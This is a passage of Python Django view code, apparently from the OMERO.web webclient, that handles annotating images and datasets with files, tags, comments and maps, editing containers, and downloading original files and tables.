# TODO: remove this 'if' since we should only have c_type = 'image'?
context = {"manager": manager, "share_id": share_id}
if c_type not in ("share", "discussion", "tag"):
context["form_channels"] = form_channels
context["form_environment"] = form_environment
context["form_objective"] = form_objective
context["form_microscope"] = form_microscope
context["form_instrument_objectives"] = form_instrument_objectives
context["form_filters"] = form_filters
context["form_dichroics"] = form_dichroics
context["form_detectors"] = form_detectors
context["form_lasers"] = form_lasers
context["form_stageLabel"] = form_stageLabel
context["template"] = template
return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
context = {
"template": "webclient/annotations/original_metadata.html",
"imageId": image.getId(),
}
try:
om = image.loadOriginalMetadata()
if om is not None:
context["original_metadata"] = om[0]
context["global_metadata"] = om[1]
context["series_metadata"] = om[2]
except omero.LockTimeout:
# 408 is Request Timeout
return HttpResponse(content="LockTimeout", status=408)
return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
"""
Prepare objects for use in the annotation forms.
These objects are required by the form superclass to populate hidden
fields, so we know what we're annotating on submission
"""
r = request.GET or request.POST
images = (
len(r.getlist("image")) > 0
and list(conn.getObjects("Image", r.getlist("image")))
or list()
)
datasets = (
len(r.getlist("dataset")) > 0
and list(conn.getObjects("Dataset", r.getlist("dataset")))
or list()
)
projects = (
len(r.getlist("project")) > 0
and list(conn.getObjects("Project", r.getlist("project")))
or list()
)
screens = (
len(r.getlist("screen")) > 0
and list(conn.getObjects("Screen", r.getlist("screen")))
or list()
)
plates = (
len(r.getlist("plate")) > 0
and list(conn.getObjects("Plate", r.getlist("plate")))
or list()
)
acquisitions = (
len(r.getlist("acquisition")) > 0
and list(conn.getObjects("PlateAcquisition", r.getlist("acquisition")))
or list()
)
shares = (
len(r.getlist("share")) > 0 and [conn.getShare(r.getlist("share")[0])] or list()
)
wells = (
len(r.getlist("well")) > 0
and list(conn.getObjects("Well", r.getlist("well")))
or list()
)
return {
"image": images,
"dataset": datasets,
"project": projects,
"screen": screens,
"plate": plates,
"acquisition": acquisitions,
"well": wells,
"share": shares,
}
def getIds(request):
"""
Used by forms to indicate the currently selected objects prepared above
"""
r = request.GET or request.POST
selected = {
"images": r.getlist("image"),
"datasets": r.getlist("dataset"),
"projects": r.getlist("project"),
"screens": r.getlist("screen"),
"plates": r.getlist("plate"),
"acquisitions": r.getlist("acquisition"),
"wells": r.getlist("well"),
"shares": r.getlist("share"),
}
return selected
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
"""
This page gives a form for batch annotation.
Local File form and Comment form are loaded. Other forms are loaded via
AJAX
"""
objs = getObjects(request, conn)
# get groups for selected objects - setGroup() and create links
obj_ids = []
obj_labels = []
groupIds = set()
annotationBlocked = False
for key in objs:
obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
for o in objs[key]:
groupIds.add(o.getDetails().group.id.val)
if not o.canAnnotate():
annotationBlocked = (
"Can't add annotations because you don't" " have permissions"
)
obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
obj_string = "&".join(obj_ids)
link_string = "|".join(obj_ids).replace("=", "-")
if len(groupIds) == 0:
# No supported objects found.
# If multiple tags / tagsets selected, return placeholder
if (
len(request.GET.getlist("tag")) > 0
or len(request.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate tags</h2>")
else:
return handlerInternalError(request, "No objects found")
groupId = list(groupIds)[0]
conn.SERVICE_OPTS.setOmeroGroup(groupId)
manager = BaseContainer(conn)
figScripts = manager.listFigureScripts(objs)
canExportAsJpg = manager.canExportAsJpg(request, objs)
filesetInfo = None
iids = []
if "image" in objs and len(objs["image"]) > 0:
iids = [i.getId() for i in objs["image"]]
if len(iids) > 0:
filesetInfo = conn.getFilesetFilesInfo(iids)
archivedInfo = conn.getArchivedFilesInfo(iids)
filesetInfo["count"] += archivedInfo["count"]
filesetInfo["size"] += archivedInfo["size"]
context = {
"iids": iids,
"obj_string": obj_string,
"link_string": link_string,
"obj_labels": obj_labels,
"batch_ann": True,
"figScripts": figScripts,
"canExportAsJpg": canExportAsJpg,
"filesetInfo": filesetInfo,
"annotationBlocked": annotationBlocked,
"differentGroups": False,
}
if len(groupIds) > 1:
context["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
context["differentGroups"] = True # E.g. don't run scripts etc
context["canDownload"] = manager.canDownload(objs)
context["template"] = "webclient/annotations/batch_annotate.html"
context["webclient_path"] = reverse("webindex")
context["annotationCounts"] = manager.getBatchAnnotationCounts(
getObjects(request, conn)
)
return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
"""
On 'POST', This handles attaching an existing file-annotation(s) and/or
upload of a new file to one or more objects
Otherwise it generates the form for choosing file-annotations & local
files.
"""
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
# Use the first object we find to set context (assume all objects are in
# same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
obj_count = sum([len(selected[types]) for types in selected])
if obj_count == 0:
raise Http404("Need to specify objects via e.g. ?image=1")
# Get appropriate manager, either to list available Files to add to single
# object, or list ALL Files (multiple objects)
manager = None
if obj_count == 1:
for t in selected:
if len(selected[t]) > 0:
o_type = t[:-1] # "images" -> "image"
o_id = selected[t][0]
break
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if o_type == "tagset":
# TODO: this should be handled by the BaseContainer
o_type = "tag"
kw = {}
if o_type is not None and int(o_id) > 0:
kw[str(o_type)] = int(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
if manager is not None:
files = manager.getFilesByObject()
else:
manager = BaseContainer(conn)
for dtype, objs in oids.items():
if len(objs) > 0:
# NB: we only support a single data-type now. E.g. 'image' OR
# 'dataset' etc.
files = manager.getFilesByObject(
parent_type=dtype, parent_ids=[o.getId() for o in objs]
)
break
initial["files"] = files
if request.method == "POST":
# handle form submission
form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
if form_file.is_valid():
# Link existing files...
files = form_file.cleaned_data["files"]
added_files = []
if files is not None and len(files) > 0:
added_files = manager.createAnnotationsLinks("file", files, oids)
# upload new file
fileupload = (
"annotation_file" in request.FILES
and request.FILES["annotation_file"]
or None
)
if fileupload is not None and fileupload != "":
newFileId = manager.createFileAnnotations(fileupload, oids)
added_files.append(newFileId)
return JsonResponse({"fileIds": added_files})
else:
return HttpResponse(form_file.errors)
else:
form_file = FilesAnnotationForm(initial=initial)
context = {"form_file": form_file}
template = "webclient/annotations/files_form.html"
context["template"] = template
return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
"""
Handle adding Rating to one or more objects
"""
if request.method != "POST":
raise Http404("Only POST supported")
rating = getIntOrDefault(request, "rating", 0)
oids = getObjects(request, conn)
# add / update rating
for otype, objs in oids.items():
for o in objs:
o.setRating(rating)
# return a summary of ratings
return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
"""Handle adding Comments to one or more objects
Unbound instance of Comment form not available.
If the form has been submitted, a bound instance of the form
is created using request.POST"""
if request.method != "POST":
raise Http404("Unbound instance of form not available.")
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
"shares": oids["share"],
}
# Use the first object we find to set context (assume all objects are in
# same group!) this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Handle form submission...
form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
if form_multi.is_valid():
# In each case below, we pass the {'object_type': [ids]} map
content = form_multi.cleaned_data["comment"]
if content is not None and content != "":
if oids["share"] is not None and len(oids["share"]) > 0:
sid = oids["share"][0].id
manager = BaseShare(conn, sid)
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
textAnn = manager.addComment(host, content)
# For shares we need to return html for display...
context = {
"tann": textAnn,
"added_by": conn.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
# ...otherwise Comments are re-loaded by AJAX json
# so we don't *need* to return anything
manager = BaseContainer(conn)
annId = manager.createCommentAnnotations(content, oids)
context = {"annId": annId, "added_by": conn.getUserId()}
return context
else:
# TODO: handle invalid form error
return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
"""
Handle adding Map Annotations to one or more objects
POST data "mapAnnotation" should be list of ['key':'value'] pairs.
"""
if request.method != "POST":
raise Http404(
"Need to POST map annotation data as list of" " ['key', 'value'] pairs"
)
oids = getObjects(request, conn)
# Use the first object we find to set context (assume all objects are in
# same group!)
# this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
data = request.POST.get("mapAnnotation")
data = json.loads(data)
annIds = request.POST.getlist("annId")
ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
# Create a new annotation
if len(annIds) == 0 and len(data) > 0:
duplicate = request.POST.get("duplicate", "false")
duplicate.lower() == "true"
# For 'client' map annotations, we enforce 1 annotation per object
if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
duplicate = True
if duplicate:
# Create a new Map Annotation for each object:
for k, objs in oids.items():
for obj in objs:
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
obj.linkAnnotation(ann)
else:
# Create single Map Annotation and link to all objects
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
for k, objs in oids.items():
for obj in objs:
obj.linkAnnotation(ann)
# Or update existing annotations
else:
for annId in annIds:
ann = conn.getObject("MapAnnotation", annId)
if ann is None:
continue
if len(data) > 0:
ann.setValue(data)
ann.save()
else:
# Delete if no data
handle = conn.deleteObjects("/Annotation", [annId])
try:
conn._waitOnCmd(handle)
finally:
handle.close()
if len(data) == 0:
annIds = None
return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
"""
Provides json data to ome.tagging_form.js
"""
group = get_long_or_default(request, "group", -1)
conn.SERVICE_OPTS.setOmeroGroup(str(group))
try:
offset = int(request.GET.get("offset"))
limit = int(request.GET.get("limit", 1000))
except Exception:
offset = limit = None
jsonmode = request.GET.get("jsonmode")
if jsonmode == "tagcount":
tag_count = conn.getTagCount()
return dict(tag_count=tag_count)
manager = BaseContainer(conn)
manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
all_tags = manager.tags_recursive
all_tags_owners = manager.tags_recursive_owners
if jsonmode == "tags":
# send tag information without descriptions
r = list((i, t, o, s) for i, d, t, o, s in all_tags)
return r
elif jsonmode == "desc":
# send descriptions for tags
return dict((i, d) for i, d, t, o, s in all_tags)
elif jsonmode == "owners":
# send owner information
return all_tags_owners
return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
"""
This handles creation AND submission of Tags form, adding new AND/OR
existing tags to one or more objects
"""
oids = getObjects(request, conn)
selected = getIds(request)
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Tags to add to single
# object, or list ALL Tags (multiple objects)
manager = None
self_id = conn.getEventContext().userId
tags = []
# Use the first object we find to set context (assume all objects are
# in same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Make a list of all current tags
# As would be on right column of tagging dialog...
taglist, users = tree.marshal_annotations(
conn,
project_ids=selected["projects"],
dataset_ids=selected["datasets"],
image_ids=selected["images"],
screen_ids=selected["screens"],
plate_ids=selected["plates"],
run_ids=selected["acquisitions"],
well_ids=selected["wells"],
ann_type="tag",
# If we reach this limit we'll get some tags not removed
limit=ANNOTATIONS_LIMIT,
)
userMap = {}
for exp in users:
userMap[exp["id"]] = exp
# For batch annotate, only include tags that user has added to all objects
if obj_count > 1:
# count my links
myLinkCount = {}
for t in taglist:
tid = t["id"]
if tid not in myLinkCount:
myLinkCount[tid] = 0
if t["link"]["owner"]["id"] == self_id:
myLinkCount[tid] += 1
# filter
taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
selected_tags = []
for tag in taglist:
linkOwnerId = tag["link"]["owner"]["id"]
owner = userMap[linkOwnerId]
ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
canDelete = True
created = tag["link"]["date"]
linkOwned = linkOwnerId == self_id
selected_tags.append(
(tag["id"], self_id, ownerName, canDelete, created, linkOwned)
)
# selected_tags is really a list of tag LINKS.
# May be several links per tag.id
selected_tags.sort(key=lambda x: x[0])
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
if request.method == "POST":
# handle form submission
form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
newtags_formset = NewTagsAnnotationFormSet(
prefix="newtags", data=request.POST.copy()
)
# Create new tags or Link existing tags...
if form_tags.is_valid() and newtags_formset.is_valid():
# filter down previously selected tags to the ones linked by
# current user
selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
# Remove duplicates from tag IDs
selected_tag_ids = list(set(selected_tag_ids))
post_tags = list(form_tags.cleaned_data["tags"])
tags = [tag for tag in post_tags if tag not in selected_tag_ids]
removed = [tag for tag in selected_tag_ids if tag not in post_tags]
manager = BaseContainer(conn)
if tags:
manager.createAnnotationsLinks("tag", tags, oids)
new_tags = []
for form in newtags_formset.forms:
new_tags.append(
manager.createTagAnnotations(
form.cleaned_data["tag"],
form.cleaned_data["description"],
oids,
tag_group_id=form.cleaned_data["tagset"],
)
)
# only remove Tags where the link is owned by self_id
for remove in removed:
tag_manager = BaseContainer(conn, tag=remove)
tag_manager.remove(
[
"%s-%s" % (dtype, obj.id)
for dtype, objs in oids.items()
for obj in objs
],
tag_owner_id=self_id,
)
return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
else:
# TODO: handle invalid form error
return HttpResponse(str(form_tags.errors))
else:
form_tags = TagsAnnotationForm(initial=initial)
newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
context = {
"form_tags": form_tags,
"newtags_formset": newtags_formset,
"selected_tags": selected_tags,
}
template = "webclient/annotations/tags_form.html"
context["template"] = template
return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
"""
Edit and save channel names
"""
image = conn.getObject("Image", imageId)
sizeC = image.getSizeC()
channelNames = {}
nameDict = {}
for i in range(sizeC):
cname = request.POST.get("channel%d" % i, None)
if cname is not None:
cname = smart_str(cname)[:255] # Truncate to fit in DB
channelNames["channel%d" % i] = cname
nameDict[i + 1] = cname
# If the 'Apply to Dataset' button was used to submit...
if request.POST.get("confirm_apply", None) is not None:
# plate-123 OR dataset-234
parentId = request.POST.get("parentId", None)
if parentId is not None:
ptype = parentId.split("-")[0].title()
pid = long(parentId.split("-")[1])
counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
else:
counts = conn.setChannelNames("Image", [image.getId()], nameDict)
rv = {"channelNames": channelNames}
if counts:
rv["imageCount"] = counts["imageCount"]
rv["updateCount"] = counts["updateCount"]
return rv
else:
return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
request, action, o_type=None, o_id=None, conn=None, **kwargs
):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
kw = {}
if o_type is not None and int(o_id) > 0:
o_id = int(o_id)
kw[str(o_type)] = o_id
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == "addnewcontainer":
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, status=405
)
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data["name"]
description = form.cleaned_data["description"]
owner = form.cleaned_data["owner"]
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
oid = manager.createDataset(name, description, owner=owner)
elif o_type == "tagset" and o_id > 0:
oid = manager.createTag(name, description, owner=owner)
elif request.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
# No parent specified. We can create orphaned 'project',
# 'dataset' etc.
folder_type = request.POST.get("folder_type")
if folder_type == "dataset":
oid = manager.createDataset(
name,
description,
owner=owner,
img_ids=request.POST.getlist("image", None),
)
else:
oid = conn.createContainer(
folder_type, name, description, owner=owner
)
else:
return HttpResponseServerError("Object does not exist")
rdict = {"bad": "false", "id": oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
elif action == "edit":
# form for editing Shares only
if o_id is None:
raise Http404("No share ID")
if o_type == "share" and int(o_id) > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
"message": manager.share.message,
"expiration": "",
"shareMembers": manager.membersInShare,
"enable": manager.share.active,
"experimenters": experimenters,
}
if manager.share.getExpireDate() is not None:
initial["expiration"] = manager.share.getExpireDate().strftime(
"%Y-%m-%d"
)
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {"manager": manager, "form": form}
elif action == "save":
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(
initial={"experimenters": experimenters}, data=request.POST.copy()
)
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
manager.updateShareOrDiscussion(
host, message, members, enable, expiration
)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {"share": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "editname":
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={"name": txtValue})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savename":
# Save name edit in-line
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data["name"]
rdict = {"bad": "false", "o_type": o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "editdescription":
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(initial={"description": obj.description})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savedescription":
# Save editing of description in-line
if not request.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id)
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data["description"]
manager.updateDescription(o_type, description)
rdict = {"bad": "false"}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "remove":
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST["parent"]
try:
manager.remove(parents.split("|"))
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "removefromshare":
image_id = request.POST.get("source")
try:
manager.removeImage(image_id)
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "delete":
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
try:
handle = manager.deleteItem(child, anns)
request.session["callback"][str(handle)] = {
"job_type": "delete",
"delmany": False,
"did": o_id,
"dtype": o_type,
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"start_time": datetime.datetime.now(),
}
request.session.modified = True
except Exception as x:
logger.error(
"Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
)
rdict = {"bad": "true", "errs": str(x)}
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "deletemany":
# Handles multi-delete from jsTree.
object_ids = {
"Image": request.POST.getlist("image"),
"Dataset": request.POST.getlist("dataset"),
"Project": request.POST.getlist("project"),
"Annotation": request.POST.getlist("tag"),
"Screen": request.POST.getlist("screen"),
"Plate": request.POST.getlist("plate"),
"Well": request.POST.getlist("well"),
"PlateAcquisition": request.POST.getlist("acquisition"),
}
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
)
try:
for key, ids in object_ids.items():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"dtype": key,
}
if len(ids) > 1:
dMap["delmany"] = len(ids)
dMap["did"] = ids
else:
dMap["delmany"] = False
dMap["did"] = ids[0]
request.session["callback"][str(handle)] = dMap
request.session.modified = True
except Exception:
logger.error(
"Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
context["template"] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
"""
Returns the specified original file as an http response. Used for
displaying text or png/jpeg etc files in browser
"""
# May be viewing results of a script run in a different group.
conn.SERVICE_OPTS.setOmeroGroup(-1)
orig_file = conn.getObject("OriginalFile", fileId)
if orig_file is None:
return handlerInternalError(
request, "Original File does not exist (id:%s)." % (fileId)
)
rsp = ConnCleaningHttpResponse(orig_file.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
mimetype = orig_file.mimetype
if mimetype == "text/x-python":
mimetype = "text/plain" # allows display in browser
rsp["Content-Type"] = mimetype
rsp["Content-Length"] = orig_file.getSize()
if download:
downloadName = orig_file.name.replace(" ", "_")
downloadName = downloadName.replace(",", ".")
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
"""
Download OMERO.table as CSV (streaming response) or return as HTML or json
@param file_id: OriginalFile ID
@param mtype: None for html table or 'csv' or 'json'
@param conn: BlitzGateway connection
"""
query = request.GET.get("query", "*")
offset = get_long_or_default(request, "offset", 0)
limit = get_long_or_default(request, "limit", settings.PAGE)
iviewer_url = None
try:
iviewer_url = reverse("omero_iviewer_index")
except NoReverseMatch:
pass
# Check if file exists since _table_query() doesn't check
file_id = long(file_id)
orig_file = conn.getObject("OriginalFile", file_id)
if orig_file is None:
raise Http404("OriginalFile %s not found" % file_id)
lazy = mtype == "csv"
context = webgateway_views._table_query(
request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
)
if context.get("error") or not context.get("data"):
return JsonResponse(context)
# OR, return as csv or html
if mtype == "csv":
table_data = context.get("data")
def csv_gen():
csv_cols = ",".join(table_data.get("columns"))
yield csv_cols
for rows in table_data.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
)
downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
downloadName = downloadName + ".csv"
rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
rsp.conn = conn
rsp.table = context.get("table")
rsp["Content-Type"] = "application/force-download"
# rsp['Content-Length'] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
context["data"]["name"] = orig_file.name
context["data"]["path"] = orig_file.path
context["data"]["id"] = file_id
context["meta"]["query"] = query
# check if offset matches an integer page number:
if offset == 0 or offset / limit == offset // limit:
context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
# pagination links
url = reverse("omero_table", args=[file_id])
context["meta"]["url"] = url
url += "?limit=%s" % limit
if query != "*":
url += "&query=%s" % query
if (offset + limit) < context["meta"]["totalCount"]:
context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
if offset > 0:
context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
# by default, return context as JSON data
if mtype is None:
context["template"] = "webclient/annotations/omero_table.html"
context["iviewer_url"] = iviewer_url
col_types = context["data"]["column_types"]
if "ImageColumn" in col_types:
context["image_column_index"] = col_types.index("ImageColumn")
if "WellColumn" in col_types:
context["well_column_index"] = col_types.index("WellColumn")
if "RoiColumn" in col_types:
context["roi_column_index"] = col_types.index("RoiColumn")
# provide example queries - pick first DoubleColumn...
for idx, c_type in enumerate(col_types):
if c_type in ("DoubleColumn", "LongColumn"):
col_name = context["data"]["columns"][idx]
# find first few non-empty cells...
vals = []
for row in context["data"]["rows"]:
if row[idx]:
vals.append(row[idx])
if len(vals) > 3:
break
if " " in col_name or len(vals) < 2:
# Don't support queries on columns with spaces
continue
context["example_column"] = col_name
context["example_min_value"] = min(vals)
context["example_max_value"] = max(vals)
break
return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
""" Returns the file annotation as an http response for download """
ann = conn.getObject("FileAnnotation", annId)
if ann is None:
return handlerInternalError(
request, "FileAnnotation does not exist (id:%s)." % (annId)
)
rsp = ConnCleaningHttpResponse(ann.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % (
ann.getFileName().replace(" ", "_")
)
return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
""" Downloads the 'Original Metadata' as a text file """
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
om = image.loadOriginalMetadata()
txtLines = ["[Global Metadata]"]
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[1]])
txtLines.append("[Series Metadata]")
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[2]])
rspText = "\n".join(txtLines)
rsp = HttpResponse(rspText)
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = len(rspText)
rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
"""
Page displays a simple "Preparing download..." message and redirects to
the 'url'.
We construct the url and query string from request: 'url' and 'ids'.
"""
format = request.GET.get("format", None)
if format is not None:
download_url = reverse("download_as")
zipName = "Export_as_%s" % format
else:
download_url = reverse("archived_files")
